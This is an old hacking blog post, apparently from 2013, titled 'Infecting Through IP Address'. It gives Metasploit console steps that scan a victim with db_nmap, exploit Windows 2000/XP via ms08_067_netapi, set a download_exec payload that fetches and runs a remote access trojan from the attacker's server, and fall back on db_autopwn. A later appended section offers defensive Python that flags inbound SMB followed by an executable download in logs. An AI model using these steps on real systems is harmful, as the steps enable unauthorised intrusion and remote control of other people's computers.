Infecting Through IP Address

By Akshay   Posted at  7:22 PM   Hacking No comments



Requirements:
 

Nmap
Metasploit


First of all you need the target IP of your slave.

Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to the database.]



Once you do that, type Nmap.
[Use: This’ll load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV

[Use: This’ll scan the OS, ports, and services running on the slave’s computer.]

Wait about 5 minutes for the scan to complete.
Once done, note down the OS, ports, and services running on the slave’s computer.



Now it’s time to exploit the slave’s machine.

Which exploit to use depends on the OS, ports, and services running on the slave’s computer.

So you’re lucky if the OS is Win XP or 2000, because they’re easy to exploit.

No matter whether they’re protected by a firewall or not.

Now I’ll tell you how to exploit them:



Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)



Type show exploits
[Use: This’ll show all the exploits in its database.]



Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]



Now type show targets
[Use: This’ll show all targets supported by the exploit]

Now type set target 0
[Use: This’ll set the target to the one numbered 0]

Then type show payloads

[Use: This’ll bring up all the payloads]

Next type set payload windows/download_exec

[Use: This’ll set payload as windows/download_exec]



Then type show options

[Use: This’ll show all options in the exploit & payload]

In the window you’ll see many options, of which you need to fill only two: RHOST & URL.



Type set RHOST
[Use: This’ll set RHOST (slave’s ip) to xxx.xxx.xxx.xxx]



Next Type set URL [content suppressed]
[Use: This’ll set URL to your direct server link.]



At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]



You can now control your slave with the RAT.

So, any version of Win 2000-XP can be exploited easily.

In case you didn’t get one of these two OSes, immediately after the Nmap scan you can use the command db_autopwn -p -t -e.
In most cases you get a shell.
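Seen from the defender’s side, the chain this walkthrough describes (an outside host connecting to SMB on port 445 for ms08_067_netapi, then the compromised machine fetching an executable from the URL given to download_exec) leaves a recognisable footprint in firewall and proxy logs. The Python below is an added example, not code from the original post; it assumes a constructed, chronologically sorted log format and a constructed internal address prefix (192.0.2.), and flags any internal host that accepts an external SMB connection and downloads an executable shortly afterwards.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log (not from the original post): firewall connection records
# and proxy records in a simple "timestamp action src dst proto dport [GET url]"
# shape, sorted chronologically, as the detector assumes.
SAMPLE_LOG = """\
2013-05-01T10:00:01 ALLOW 203.0.113.7 192.0.2.10 TCP 445
2013-05-01T10:00:03 ALLOW 192.0.2.10 203.0.113.7 TCP 80 GET http://203.0.113.7/update.exe
2013-05-01T10:05:00 ALLOW 192.0.2.11 198.51.100.5 TCP 80 GET http://198.51.100.5/index.html
2013-05-01T11:00:00 ALLOW 203.0.113.9 192.0.2.12 TCP 445
"""

LINE_RE = re.compile(r"^(\S+) (\w+) (\S+) (\S+) (\w+) (\d+)(?: GET (\S+))?$")
INTERNAL_PREFIXES = ("192.0.2.",)  # constructed: the address range we defend
EXEC_EXTENSIONS = (".exe", ".dll", ".scr")  # what download_exec would fetch and run

def parse_log(log_text):
    """Turn the raw log text into a list of event dicts, skipping unparsable lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, _action, src, dst, _proto, dport, url = m.groups()
            events.append({"ts": datetime.fromisoformat(ts), "src": src,
                           "dst": dst, "dport": int(dport), "url": url})
    return events

def find_smb_then_download(log_text, window=timedelta(seconds=60)):
    """Return (victim, smb_source, url) for every internal host that accepted an
    SMB (445) connection from outside and, within `window`, fetched an executable."""
    events = parse_log(log_text)
    hits = []
    for i, smb in enumerate(events):
        inbound_smb = (smb["dport"] == 445 and smb["dst"].startswith(INTERNAL_PREFIXES)
                       and not smb["src"].startswith(INTERNAL_PREFIXES))
        if not inbound_smb:
            continue
        for later in events[i + 1:]:
            if later["ts"] - smb["ts"] > window:
                break  # log is sorted, so nothing further can fall inside the window
            if (later["src"] == smb["dst"] and later["url"]
                    and later["url"].lower().endswith(EXEC_EXTENSIONS)):
                hits.append((smb["dst"], smb["src"], later["url"]))
    return hits

if __name__ == "__main__":
    for victim, source, url in find_smb_then_download(SAMPLE_LOG):
        print(f"possible SMB exploit + download_exec: {victim} hit from {source}, fetched {url}")
```

A hit is a prompt to isolate the host and check whether it is missing the MS08-067 patch; blocking inbound 445 at the perimeter removes the first step entirely.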


Source: http://insecure-stuff.blogspot.com

© 2013 AKSHAY. WP Mythemeshop Converted by BloggerTheme9